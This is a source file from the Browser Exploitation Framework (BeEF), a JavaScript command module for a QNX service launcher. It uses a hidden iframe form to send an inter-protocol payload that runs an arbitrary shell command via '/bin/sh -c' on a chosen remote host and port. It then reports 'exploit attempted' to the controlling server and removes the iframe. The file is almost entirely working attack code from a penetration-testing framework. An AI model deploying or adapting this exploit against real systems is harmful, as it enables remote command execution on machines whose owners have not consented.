1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
	var rhost   = '<%= @rhost %>'; 
10
	var rport   = '<%= @rport %>';
11
	var timeout = '<%= @timeout %>';
12

13
	// validate payload
14
	try {
15
		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
16
		var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n'
17
	} catch(e) {
18
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
19
		return;
20
	}
21

22
	// validate target details
23
	if (!rport || !rhost) {
24
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
25
		return;
26
	}
27
	if (!beef.net.is_valid_port(rport)) {
28
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
29
		return;
30
	}
31

32
	// send commands
33
	var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
34
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
35

36
	// clean up
37
	cleanup = function() {
38
		document.body.removeChild(qnx_iframe_<%= @command_id %>);
39
	}
40
	setTimeout("cleanup()", timeout*1000);
41

42
});
43

44

45